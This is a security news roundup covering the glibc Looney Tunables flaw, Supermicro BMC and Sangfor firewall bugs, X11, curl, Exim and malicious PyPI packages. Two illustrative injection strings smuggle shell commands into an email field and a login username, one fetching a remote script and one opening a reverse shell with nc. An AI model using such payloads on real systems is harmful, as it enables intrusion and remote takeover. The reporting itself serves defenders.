This week starts out with a nifty vulnerability in the glibc dynamic loader. This is an important step in running a binary executable on Linux, as it pulls the list of required shared libraries, and loads those libraries into memory. Glibc also includes a feature to adjust some runtime settings, via the GLIBC_TUNABLES environment variable. That’s where the vulnerability resides, and researchers from Qualsys obviously had a bit of fun in taking inspiration to pick the vulnerability name, “Looney Tunables”.

The problem is memory handling in the sanitizing parser. This function iterates through the environment variable, looking for strings of tunable1=aa, separated by colons. These strings get copied to the sanitized buffer, but the parsing logic goes awry when handling the malformed tunable1=tunable2=AAA. The first equals sign is taken at face value, copying the rest of the string into the buffer. But then the second equals sign is also processed as another key=value pair, leading to a buffer overflow.

The reason this particular overflow is interesting is that if the binary to be run is a Set-User-ID (SUID) root application, the dynamic loader runs as root, too. If the overflow can achieve code execution, then it’s a straightforward privilege escalation. And since we’re talking about it, you know there’s a way to execute code. It turns out, it’s possible to overwrite the pointer to the library search path, which determines where the dynamic loader will look for libraries. Tell it to look first in an attacker-controlled location, and you can easily load a malicious libc.so for instant code execution.

This vulnerability affects many Linux distros, and there’s already a Proof of Concept (PoC) published. So, it’s time to go check for updates for cve-2023-4911.

Yo Dog, I heard you Liked Linux Servers

Someone put a vulnerable Linux server in your Linux servers. Naturally that’s the Baseboard Management Controller (BMC) found in many server-class computers. Admittedly, it’s extremely convenient to have a way to access a remote server for re-installs, or to get back in after a firewall configuration change goes wrong. But the old advice still rings true: Don’t put it on the Internet!

Supermicro’s BMC firmware is in the cross-hairs here, and one of the first vulnerabilities found was command injection in the email alerts settings. It’s a trivial case where a shell command is composed of values set in the interface, and then run as root. Yes, my email is bobby@tables.com;curl%20evilscript.sh, why do you ask?

That’s only good for an authenticated user. So you’ll be thrilled to know there’s also a couple ways to bypass authentication. The most straightforward is to construct a URL that points to the BMC, and includes some JS as an argument. Get an authenticated user to click the link, and the JS executes in their session. But that requires user interaction — falling for the malicious link.

So there’s one more approach — poison. The BMC web app stores settings like preferred language in the user cookie. And that value is then inserted into the BMC pages on each load. If an attacker can poison the cookie, a script can run on every page load. While this doesn’t require falling for the trick repeatedly, it does still require a toe-hold, most likely via the doctored link. Amid the normal wrangling between vendor and researcher about how critical each issue really is, Supermicro has published updates addressing the issues.

Lines of sheer terror

Why do we need Wayland? Because X11 has vulnerabilities that have been in the code base since 1988 — and one from 1996, and two from 1998. One of those bugs is an integer overflow when creating an image, and leads to a heap overflow. Of all the issues, this seems to be likely to lead to code execution. This sort of brokenness has been known about for over a decade now, and is one of the main reasons so many distros and developers are pushing for Wayland.

Not a vulnerability? OK, We’ll Publish Now

The write-up from Watchtowr Labs on problems found in the Sangfor Next Generation Application Firewall (NGAF) is a delight — if you enjoy thinly veiled sardonic mockery. The NGAF has multiple unfortunate vulnerabilities, with the worst being a unauthenticated command injection attack in the username of the login page. Yes, my username really is bobby.tables; nc -e /bin/bash 1.2.3.4, why do you ask?

So here’s where the mockery comes from. When the Watchtowr team contacted Sangfor to report these disastrous problems in their “truly secured, integrated and simplified firewall solution”, Sangfor responded that the problems were all either already fixed, or were false positives. That means that Watchtowr can release their findings right away, and not worry about them being 0-days. It’s sort of the ultimate in calling an OEM’s bluff. And for our money? Maybe stick to brands that do a bit better responding to security problems.

Curl

On the 11th, this upcoming Wednesday, be on the lookout for a curl update that fixes a high severity curl/libcurl vulnerability. There aren’t any details available yet, besides the ominous warning from the curl team that it’s serious.

Bits and Bytes

Exim has a set of six bugs that were reported through ZDI, released publicly on September 27th. Three of those issues were fixed October 3rd with release 4.96.1, with the other three still pending. What makes this particularly troubling is that ZDI started the disclosure process in June of 2022. Not a good look for Exim.

There continues to be a campaign of malicious Python packages, working to steal data and redirect cryptocurrency from anyone unfortunate enough to download one of the packages. The payload seems to only trigger on Windows systems, and the known packages have managed a distressing-yet-impressive 75,000 total downloads.

BinDiff is now open source. This useful tool from Google is all about sniffing out what changed between versions of software, when all you have to work from is the binaries. It does some limited decompiling, too. Perfect tool for reverse engineering a security patch.